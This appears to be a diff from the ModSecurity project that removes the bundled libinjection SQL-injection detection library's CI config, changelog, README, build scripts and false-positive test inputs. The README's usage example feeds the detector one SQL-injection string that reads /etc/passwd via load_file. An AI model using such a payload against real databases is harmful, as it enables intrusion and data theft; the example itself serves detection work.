AC_CONFIG_HEADERS([src/config.h])
# Doxygen support
DX_HTML_FEATURE(ON)
DX_CHM_FEATURE(OFF)
DX_CHI_FEATURE(OFF)
DX_MAN_FEATURE(OFF)
DX_RTF_FEATURE(OFF)
DX_XML_FEATURE(OFF)
DX_PDF_FEATURE(OFF)
DX_PS_FEATURE(OFF)
DX_INIT_DOXYGEN([ModSecurity],[doc/doxygen.cfg])
# make check-valgrind
AX_VALGRIND_DFLT([sgcheck], [off])
AX_VALGRIND_CHECK
# Generate the files.
AC_OUTPUT
# Print a fancy summary
echo " "
echo " "
echo "ModSecurity - ${MSC_GIT_VERSION} for $PLATFORM"
echo " "
echo " Mandatory dependencies"
echo -n " + libInjection ...."
echo LIBINJECTION_VERSION
echo -n " + SecLang tests ...."
echo SECLANG_TEST_VERSION
echo " "
echo " Optional dependencies"
## GeoIP - MaxMind
if test "x$GEOIP_FOUND" = "x0" && test "x$MAXMIND_FOUND" = "x0"; then
echo " + GeoIP/MaxMind ....not found"
fi
if test "x$GEOIP_FOUND" = "x1" || test "x$MAXMIND_FOUND" = "x1"; then
echo -n " + GeoIP/MaxMind ....found "
echo ""
if test "x$MAXMIND_FOUND" = "x1"; then
echo " * (MaxMind) v${MAXMIND_VERSION}"
echo " ${MAXMIND_DISPLAY}"
fi
if test "x$GEOIP_FOUND" = "x1"; then
echo " * (GeoIP) v${GEOIP_VERSION}"
echo " ${GEOIP_DISPLAY}"
fi
fi
if test "x$GEOIP_FOUND" = "x2" && test "x$MAXMIND_FOUND" = "x2"; then
echo " + GeoIP/MaxMind ....disabled"
fi
## LibCurl
if test "x$CURL_FOUND" = "x0"; then
echo " + LibCURL ....not found"
fi
if test "x$CURL_FOUND" = "x1"; then
echo -n " + LibCURL ....found "
if ! test "x$CURL_VERSION" = "x"; then
echo "v${CURL_VERSION}"
else
echo ""
fi
echo " ${CURL_DISPLAY}"
fi
if test "x$CURL_FOUND" = "x2"; then
echo " + LibCURL ....disabled"
fi
## YAJL
if test "x$YAJL_FOUND" = "x0"; then
echo " + YAJL ....not found"
fi
if test "x$YAJL_FOUND" = "x1"; then
echo -n " + YAJL ....found "
if ! test "x$YAJL_VERSION" = "x"; then
echo "v${YAJL_VERSION}"
else
echo ""
fi
echo " ${YAJL_DISPLAY}"
fi
if test "x$YAJL_FOUND" = "x2"; then
echo " + YAJL ....disabled"
fi
## LMDB
if test "x$LMDB_FOUND" = "x0"; then
echo " + LMDB ....not found"
fi
if test "x$LMDB_FOUND" = "x1"; then
echo -n " + LMDB ....found "
if ! test "x$LMDB_VERSION" = "x"; then
echo "v${LMDB_VERSION}"
else
echo ""
fi
echo " ${LMDB_DISPLAY}"
fi
if test "x$LMDB_FOUND" = "x2"; then
echo " + LMDB ....disabled"
fi
## libxml2
if test "x$LIBXML2_FOUND" = "x0"; then
echo " + LibXML2 ....not found"
fi
if test "x$LIBXML2_FOUND" = "x1"; then
echo -n " + LibXML2 ....found "
if ! test "x$LIBXML2_VERSION" = "x"; then
echo "v${LIBXML2_VERSION}"
else
echo ""
fi
echo " ${LIBXML2_DISPLAY}"
fi
if test "x$LIBXML2_FOUND" = "x2"; then
echo " + LibXML2 ....disabled"
fi
## SSDEEP
if test "x$SSDEEP_FOUND" = "x0"; then
echo " + SSDEEP ....not found"
fi
if test "x$SSDEEP_FOUND" = "x1"; then
echo -n " + SSDEEP ....found "
if ! test "x$SSDEEP_VERSION" = "x"; then
echo "v${SSDEEP_VERSION}"
else
echo ""
fi
echo " ${SSDEEP_DISPLAY}"
fi
if test "x$SSDEEP_FOUND" = "x2"; then
echo " + SSDEEP ....disabled"
fi
## LUA
if test "x$LUA_FOUND" = "x0"; then
echo " + LUA ....not found"
fi
if test "x$LUA_FOUND" = "x1"; then
echo -n " + LUA ....found "
if ! test "x$LUA_VERSION" = "x"; then
echo "v${LUA_VERSION}"
else
echo ""
fi
echo " ${LUA_DISPLAY}"
fi
if test "x$LUA_FOUND" = "x2"; then
echo " + LUA ....disabled"
fi
## PCRE2
if test "x$PCRE2_FOUND" = "x0"; then
echo " + PCRE2 ....not found"
fi
if test "x$PCRE2_FOUND" = "x1"; then
echo -n " + PCRE2 ....found "
if ! test "x$PCRE2_VERSION" = "x"; then
echo "v${PCRE2_VERSION}"
else
echo ""
fi
echo " ${PCRE2_DISPLAY}"
fi
if test "x$PCRE2_FOUND" = "x2"; then
echo " + PCRE2 ....disabled"
fi
echo " "
echo " Other Options"
if test $buildTestUtilities = true; then
if test $debugLogs = true; then
echo " + Test Utilities ....enabled"
else
echo " + Test Utilities ....partially"
fi
else
echo " + Test Utilities ....disabled"
fi
if test $debugLogs = true; then
echo " + SecDebugLog ....enabled"
else
echo " + SecDebugLog ....disabled"
fi
if test "$aflFuzzer" = "true"; then
echo " + afl fuzzer ....enabled"
echo " ($FUZZ_CPPCFLAGS)"
else
echo " + afl fuzzer ....disabled"
fi
if test "$buildExamples" = "true"; then
echo " + library examples ....enabled"
else
echo " + library examples ....disabled"
fi
if test "$buildParser" = "true"; then
echo " + Building parser ....enabled"
else
echo " + Building parser ....disabled"
fi
if test "$mutexPm" = "true"; then
echo " + Treating pm operations as critical section ....enabled"
else
echo " + Treating pm operations as critical section ....disabled"
fi
echo " "
if test "$aflFuzzer" = "true"; then
echo "WARNING: afl fuzzer was enabled. Make sure you are using the"
echo " 'afl-clang-fast' as the compiler, otherwise the compilation"
echo " will fail."
echo " "
echo " You can set the compiler using:"
echo " "
echo " $ export CXX=afl-clang-fast++ "
echo " $ export CC=afl-clang-fast "
echo " "
fi


@ -1,87 +0,0 @@
name: CI
on:
push:
pull_request:
jobs:
cppcheck:
runs-on: ubuntu-20.04
name: cppcheck
steps:
- uses: actions/checkout@v2
name: checkout repo
- name: Setup Dependencies
run: |
sudo apt-get update -y -qq
sudo apt-get install cppcheck
- name: cppcheck
run: |
cppcheck --std=c89 \
--enable=all \
--inconclusive \
--suppress=variableScope \
--suppress=missingIncludeSystem \
--quiet \
--error-exitcode=1 \
--template='{file}:{line} {id} {severity} {message}' \
.
clang-static:
runs-on: ubuntu-20.04
name: clang static check
steps:
- uses: actions/checkout@v2
name: checkout repo
- name: make analyze
run: make analyze
working-directory: src
env:
CFLAGS: '-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror'
build-linux:
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
platform: [x32, x64]
compiler: [gcc, clang]
steps:
- uses: actions/checkout@v2
- name: Setup Dependencies
run: |
sudo apt-get update -y -qq
sudo apt-get install valgrind
- name: build
run: make all
- name: test
run: make -e check
- name: clean
run: make clean
- name: build pedantic
run: make all
env:
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'
- name: test valgrind
run: make -e check
env:
VALGRIND: 'valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/home/runner/work/libinjection/libinjection/src/alpine.supp'
build-macos:
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [macos-10.15]
compiler: [gcc, clang]
steps:
- uses: actions/checkout@v2
- name: build
run: make all
- name: test
run: make -e check
- name: clean
run: make clean
- name: build pedantic
run: make all
env:
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'


@ -1,46 +0,0 @@
*~
*.pyc
*.dSYM
c/#*
*.plist
*.info
*.gch
*.gcov
# gnu autotest
*.trs
#aclocal.m4
app.info
autom4te.cache
#compile
config.h
#config.h.in
#config.guess
config.log
config.status
#config.sub
#configure
configure.scan
coverage_report
#depcomp
#install-sh
#libtool
#ltmain.sh
#Makefile.in
#m4
#missing
stamp-h1
*~
*.html
*.log
*.o
*.la
*.so*
*.a
.deps
*.tar*
*.zip
*.lo
*.gcno
*.gcda


@ -1,2 +0,0 @@
see CHANGELOG.md


@ -1,288 +0,0 @@
# NEXT
* [#126](/client9/libinjection/issues/126) oracle false negative
* [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS
* [#112](/client9/libinjection/issues/112) fix shared library on macOS
* [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS
* [#113](/client9/libinjection/issues/113) save space in struct
* [#126](/client9/libinjection/issues/126) add usage to sqli cli tool
* [#125](/client9/libinjection/issues/125) many false positives
* [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation
# v3.9.2 - 2016-05-21
* Release of whatever changes have been made over the last 2.5 years.
# v3.9.1 - 2013-12-26
Day-After-Christmas Edition
* No functional changes
* Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD
* For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux
* Other minor style changes to header files.
# v3.9.0 - 2013-11-29
Black Friday Edition
* Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h`
* Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well.
* Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally.
* Over 400 unit tests now!
* Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke.
* PHP documentation fixes, thanks @LightOS
# v3.8.0 - 2013-10-18
LAMP Special Edition: MySQL and PHP improvements
* [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r)
* Fixes to Lua testdriver and portability fixes
* Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module.
* API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases.
NOTE:
Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem.
Here's why:
* Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0.
* In addition, I've received a number of reports of generated code failing various static analysis
* I can't triangulate which SWIG for which language for which OS will work for you
* I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways.
# v3.7.1 -- 2013-10-13
* Remove un-needed code
# v3.7.0 -- 2013-10-13
Major Release
* [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub)
* Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives.
* [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel)
* [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily)
* Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems
Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html
* Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)`
* Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
# v3.6.0 -- 2013-09-11
* New PHP API
* Big fingerprint update
** about 500 new fingerprints added based on fuzzing tests by Reto Ischi
** about 700 impossible, dead fingerprints removed
** adding folding rule for "sqltype sqltype -> sqltype" since
`select binary binary binary 1` is valid
* Other minor fingerprints added
* -maybe- API change as typedefs and structs were re-arranged for SWIG
# v3.5.3 -- 2013-08-25
* Fingerprint update -- `BETWEEN` operation bypasses
* Fingerprint update -- `ANY/SOME` quasi-function bypasses
* Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1`
* Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
* More adjustments to the PHP/MYSQL backtick to reduce false positives
# v3.5.2 -- 2013-08-21
* Fingerprint update. Credit: Reto Ischi
# v3.5.1 -- 2013-08-21
* found regression in handling of PHP/MySQL backticks. Tests added
* Dead code removed.
* Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
# v3.5.0 -- 2013-08-21
* Bug fix for libinjection_sqli_reset @brianrectanus
https://github.com/client9/libinjection/pull/50
* Non-critical parser fix for numbers with oracle's ending
suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not
(SELECT, 1F, ROM)
* Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS
* Better parsing of generated number forms of "10.e" and "10.10e"
(these are actually table specifiers!) HT @LightOS
* Change sizing of some static arrays to have a length >= 8
For GCC based applications, this allows -fstack-protector to work
and -Wstack-protector will now not emit errors.
* Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS.
About 10% performance loss with -fstack-protector-all
* Improvements in reducing false positives, HT modsecurity team
* Add fingerprint, HT @FluxReiners
* Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL)
* Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..."
* Fi possible stack over-read, and improve detection of "sp_password" flag
in short sqli HT modsecurity team
# v3.4.1 2013-07-18
* Fingerprint update only HT @LightOS
# v3.4.0 2013-07-18
* Fix regression with COLLATE
* Handle "procedure analyze" under MySQL
* Make API most robust when setting flags
* Add folding API
* Add new all-C test driver to improve testing speed
* Makefile cleanups
* Fired Jenkins! Using in-house system.
* Fixed bypass reported by @FluxReiners
# v3.3.0 2013-07-13
* change how backslash is handled to catch old MSSQL servers sqli
See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
for details
* Reworking of COLLATE to handle MySQL, TSQL types automatically
* Handle bizarro world TSQL '\%1' which is parsed as "0 % 1"
* Better stacked query detection, fixing some regressions
* Folding improvements
* False positive improvements
# v3.2.0 2013-07-12
* Parse binary litterals "0b010101" used by at least mysql and pgsql
* Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules
"-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS
* Add parsing rules for COLLATION in MySQL, CREDIT @LightOS
* Reduce false positives by removing all fingerprints that contained "sn"
* Improvement in handling MySQL 'binary' quasi-operator/type
* Improvements in folding
* Removed dependency on SWIG for installing python module
# v3.1.0 2013-07-02
* Fix for parsing Oracle numeric literals
* Fix for oracle whitespace with null char.
* Add unusual SQL join types to keywords lists
* Minor fixes to python API examples
# v3.0.0 2013-06-23
Big Release and Big Engine change. Highly recommend
* Numerous evasions and false positives fixed!
* Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`.
* Folding engine completely rewritten to be simpler and easier to extend, debug, port.
* MySQL `backticks` now handled correctly
* @"var" and @'var' parsed correctly (mysql)
* ":=" operator parsed correctly
* non-ascii SQL variables and barewords handled correctly
* less false positives and those that are false positives
are more "indeterminate cases" and are only in a few
fingerprints
* autogeneration of fingerprints with trivial SQL variations
* support for pgsql $ strings
* support for oracle's q and nq strings
* support for mysql's n strings
* parsing stats exposed
* new swig bindings for python and lua, with callbacks into original scripting
language for accept/reject of fingerprints (i.e. manage fingerprints in
script, not C code)
* Improved parsing of various special cases in MySQL
* Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately.
* Probably a bunch of other stuff too
# v2.0.4 2013-05-21 IMPORTANT
All users are advised to upgrade due to risk of DOS
## security
* more fingerprints, more tests
* Issue 34: fix infinite loop
# v2.0.3 2013-05-21
## security
* Add variations on '1U(((', thanks @LightOS
* Add automatically all variations on other cases of
'parens padding'
# v2.0.2 2013-05-21
## security
* Added fingerprint 'nU(kn' and variations, thanks to
discussion with @ModSecurity .
# v2.0.1 2013-05-21
## security
* Added fingerprint knknk, thanks @d0znpp
# v2.0.0 2013-05-17
Version 2 is more a software engineering release than SQLi.
The API, the code, and filenames are improved for embedded
use. Please see the README.md file for details on use.
## security
* Fix Issue30: detection of more small sqli forms with fingerprint "1c".
* Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus
## API Changes
BIG CHANGES
* File name changes. These are the only relevant files:
* `c/libinjection.h`
* `c/libinjection_sqli.c`
* `c/libinjection_sqli_data.h`
* `COPYING`
* Just need to include `libinjection.h` and link with `libinjection_sqli_.c`
* `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated.
Only use `#include "libinjection.h"`
* API name changes `is_sqli` and `is_string_sqli` are now
`libinjection_is_sqli` and `libinjection_is_string_sqli`
* API change, `libinjection_is_sqli` now takes a 5th arg for callback data
* API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5
in which case, a default lookup of fingerprints is used.
* `sqlmap_data.json` now includes fingerprint information, so people making
ports only need to parse one file.
## other
* Allow `clang` compiler (also in Jenkins, a build with clang and
make-scan is done)
* Optimizations should result in > 10% performance improvement
for normal workloads
* Add `sqlite3` special functions and keywords (since why not)
# v1.2.0 2013-05-06
## security
* fix regression in detecting SQLi of type '1c'
##
* improved documentation, comments, edits.
# v1.1.0 2013-05-04
## security
* Fix for nested c-style comments used by postgresql and transact-sql.
Thanks to @Kanatoko for the report.
* Numerous additions to SQL functions lists (in particular pgsql, transact-sql
and ms-access functions)
Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error.
Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-)
* Adding of fingerprints to detect HPP attacks.
* Algorihmically added new fingerprints to detect new _future_ sqli attacks. All of these
new fingerprints have no been seen 'in the wild' yet.
## other
* Replaced BSD memmem with optimzed version. This eliminates all 3rd party code.
* Added alpha python module (python setup.py install)
* Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding.
* Added version number in sqlparse.h, based on
http://www.python.org/dev/peps/pep-0386/#normalizedversion
# v1.0.0 2013-04-24
* retroactive initial release
* all memory issues fixed


@ -1,32 +0,0 @@
Copyright (c) 2012-2016, Nick Galbreath
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
https://github.com/client9/libinjection
http://opensource.org/licenses/BSD-3-Clause


@ -1,110 +0,0 @@
<img src="https://raw.githubusercontent.com/libinjection/libinjection/main/misc/libinjection.svg" width="70%">
![CI](https://github.com/libinjection/libinjection/workflows/CI/badge.svg)
[![license](https://img.shields.io/badge/license-BSD_3--Clause-blue.svg?style=flat)](https://raw.githubusercontent.com/client9/libinjection/master/COPYING)
SQL / SQLI tokenizer parser analyzer. For
* C and C++
* [PHP](https://libinjection.client9.com/doc-sqli-php)
* [Python](https://libinjection.client9.com/doc-sqli-python)
* [Lua](/lua)
* [Java](https://github.com/jeonglee/Libinjection) (external port)
* [LuaJIT/FFI] (https://github.com/p0pr0ck5/lua-ffi-libinjection) (external port)
See
[https://www.client9.com/](https://www.client9.com/)
for details and presentations.
Simple example:
```c
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include "libinjection.h"
#include "libinjection_sqli.h"
int main(int argc, const char* argv[])
{
struct libinjection_sqli_state state;
int issqli;
const char* input = argv[1];
size_t slen = strlen(input);
/* in real-world, you would url-decode the input, etc */
libinjection_sqli_init(&state, input, slen, FLAG_NONE);
issqli = libinjection_is_sqli(&state);
if (issqli) {
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
}
return issqli;
}
```
```
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
sqli detected with fingerprint of 's&1UE'
```
More advanced samples:
* [sqli_cli.c](/src/sqli_cli.c)
* [reader.c](/src/reader.c)
* [fptool](/src/fptool.c)
VERSION INFORMATION
===================
See [CHANGELOG](/CHANGELOG) for details.
Versions are listed as "major.minor.point"
Major are significant changes to the API and/or fingerprint format.
Applications will need recompiling and/or refactoring.
Minor are C code changes. These may include
* logical change to detect or suppress
* optimization changes
* code refactoring
Point releases are purely data changes. These may be safely applied.
QUALITY AND DIAGNOSITICS
========================
The continuous integration results at
https://travis-ci.org/client9/libinjection tests the following:
- [x] build and unit-tests under GCC
- [x] build and unit-tests under Clang
- [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org)
- [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck)
- [x] checks for memory errors using [valgrind](http://valgrind.org/)
LICENSE
=============
Copyright (c) 2012-2016 Nick Galbreath
Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source
license. See [COPYING](/COPYING) for details.
EMBEDDING
=============
The [src](https://github.com/client9/libinjection/tree/master/src)
directory contains everything, but you only need to copy the following
into your source tree:
* [src/libinjection.h](/src/libinjection.h)
* [src/libinjection_sqli.c](/src/libinjection_sqli.c)
* [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h)
* [COPYING](/COPYING)


@ -1,33 +0,0 @@
# libinjection release howto
Comments and improvements welcome.
## Update the internal version number
in `src/libinjection_sqli.c` edit the definition
```c
#define LIBINJECTION_VERSION "3.9.1"
```
## Update the CHANGELOG.md file
There isn't much of specific format. It's not GNU changelog style. Just make sure it looks good in markdown.
## test and commit
Something like this
```sh
make test
git commit -m 'VERSION'
```
## run ./tags.sh
This will get the version number from the file above and create a local
and remote tag.
## HELP!
I would be great to dump a src tarball on github releases.


@ -1,20 +0,0 @@
#!/bin/sh
set -e
#
# adjust as needed for your clang setup
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
# stdout and stdin definitions
#
make clean
export CC=clang
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror -fsanitize=address"
make -e check


@ -1,20 +0,0 @@
#!/bin/sh
set -e
#
# adjust as needed for your clang setup
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
# stdout and stdin definitions
#
make clean
export CC=clang
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror"
make -e check


@ -1,16 +0,0 @@
#!/bin/sh
set -e
#
# See https://wiki.debian.org/Hardening for details
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
make clean
export CFLAGS="-g -O3 -pie -fPIE -fPIC -fstack-protector --param ssp-buffer-size=4 -Wall -Wextra -Wformat -Wformat-security -Werror -Wcast-align -Wshadow -Wpointer-arith -Wcast-qual -Wstack-protector -D_FORTIFY_SOURCE=2 -ansi -pedantic"
make -e


@ -1,11 +0,0 @@
#!/bin/sh
set -e
#
# gprof build
#
make clean
export CC=gcc
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
make -e


@ -1,9 +0,0 @@
#!/bin/sh
set -e
#
# gprof build
#
make clean
export CFLAGS="-O2 -pg -ansi"
make -e


@ -1,12 +0,0 @@
Files in this directory are sample input for SQLi or false positives
Lines that are empty or start with `#` ignored. Otherwise they should
be URL-encoded "user input" as might be found in query string.
Each of the `sqli-\*.txt` files should generate a sqli match (with a few
outliers).
The `false-positive.txt` file are inputs that in the process of
development where falsely marked as sqli.


@ -1,443 +0,0 @@
#
# List of various inputs that failed and caused a false positive
#
24-7-TEAM
A-LAST-MINUTE
1/26/11
TRUE#LAST
1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA=
HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"}
NOT ALL WHO WANDER
ALL NATURAL SKIN CARE
DAD TO BE
UNIQUE TABLE RUNNER
AS FOR ME AND MY HOUSE
LOCK AND KEY
1 BY 1 INCH PILLOWS
SET WITH ENVELOPES
FROM TO TAG CHRISTMAS
3 BY 5 RECIPE CARDS
3 TO 6 MONTHS
BY ORDER OF THE MANAGEMENT
A IS FOR ADORABLE
WHERE IS GEORGE
KEY TO MY HEART
Y'ALL COME BACK NOW
1950's dresses
EC-2HM85288X8372881C
4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM
MATS 5" BY 7"
I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE
JACK-O'-LANTERN?
7 AND A HALF
7 FOR ALL MANKIND
5 AND A QUARTER BY 8 INCHES
40 AND FAB
6 KEY CHAR
3 FOR 20
F AND A NECKLACE
21 LONG IN
FD AND C COSMETIC COLORANT
2 OR 4 METAL BUTTONS
13 IS A LUCKY NUMBER
1 AND 1/2" BUTTON
"DARE TO BE AWESOME":
"ALASKA" + 1978
10 DOUBLE LOOP SETS
B IS FOR BLACK BY TATIANA SOROKA
DANCIN' LIKE A ROBOT ON FIRE
D AND D DICE
BE TRUE 2 U
B AND A PRINTS
"SWEATER DRESS" AND "CHRISTMAS"
SMALL "& SIGN
9-2-5 BLACK PUMPS
2-3/4 CELLO BAGS
30-30-60 INVITE
11-11-11 DAY POPPY
4-1-7-CUEIPNJF1QIETPB8PQBVZ5
1-1/8 PLUGS
1 1/8 PLUGS
1&1/8 PLUGS
909-527-9247
+1 (917) 666-0987
(9178787873)
(junk)
"PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT
DRESS SIZE 20" -PATTERN -BABY
"CROSS STITCH" -PDF -WOOL
DRESS WITH HAT 18';
2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194
IN ORDER TO USE SEARCH
BEGIN EACH DAY WITH LOVE
SQL-3-RMGN_V-BBNGV40NGQRAGGZ
IF-9-86MDXMB1Z-FINBSB4WIDF-B
HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES
GROUP UPDATE FACEBOOK LINK NOT PROVIDED
CHRISTMAS STOCKING "NOT" STUFFER
ORDER@ALLTHATSHEWANTS.US
ALL@MKSAT.NET
ALL NATURAL SHA
WHERE IS THE SHOW
"ALASKA" + 1978
SMALL "&" SIGN
50%2526%252339%253Bs
VINTAGE CARVED BEAD'" -LUCITE -PLASTIC
pr_shop%22%3EMamaBearBabyWear%3C/a%3E
poem+'if'
CRAFT SHOW SET
DIARY WITH LOCK
CLIP ON READ
CLOCK WITH KEYS
THERE IS NOT PLACE LIKE HOME
BASE; SET SWAROVSKI
